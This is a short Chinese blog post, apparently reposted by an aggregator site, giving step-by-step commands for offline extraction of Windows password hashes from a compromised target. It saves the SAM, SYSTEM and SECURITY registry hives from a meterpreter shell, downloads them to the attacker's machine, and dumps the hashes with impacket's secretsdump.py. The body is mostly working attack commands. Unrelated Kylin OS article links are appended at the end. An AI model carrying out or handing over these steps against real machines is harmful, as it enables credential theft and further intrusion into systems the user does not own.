离线提取目标机hash
Posted -qing-
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了离线提取目标机hash相关的知识,希望对你有一定的参考价值。
0x01 前言
很多环境下,不允许上传或者使用mimikatz。而针对非域控的单机离线提取hash显得尤为重要。
在meterpreter shell命令切到交互式cmd命令。
0x02 过程
reg save 方式使得需要下载的目标机
Ps:reg save将指定子项、项的注册表值的副本保存到指定文件中
我们需要导出的hash文件
reg save HKLMSYSTEM sys.hiv
reg save HKLMSAM sam.hiv
reg save hklmsecurity security.hiv
在meterpreter中使用shell命令来到交互式cmd
这样在c盘下就导出了三个注册表文件
返回meterpreter,使用meterpreter下自带download功能来将目标机的三个注册表文件下载到攻击机
下载好了后我们需要读取目标的hash
用到的工具是impacket的 secretsdump.py。Kali默认路径:
/root/impacket/examples/secretsdump.py
Ps:Impacket是一个Python类库,用于对SMB1-3或IPv4 / IPv6 上的TCP、UDP、ICMP、IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerberos,WMI,LDAP等协议进行低级编程访问。
命令如下:
python /root/impacket/examples/secretsdump.py ‐sam sam.hiv ‐security security.hiv ‐system sys.hiv LOCAL
以上是关于离线提取目标机hash的主要内容,如果未能解决你的问题,请参考以下文章
麒麟系统开发笔记:在线安装软件后,提取其安装包,部署目标机使用离线软件包方式安装软件
麒麟系统开发笔记:在线安装软件后,提取其安装包,部署目标机使用离线软件包方式安装软件
麒麟系统开发笔记:在线安装软件后,提取其安装包,部署目标机使用离线软件包方式安装软件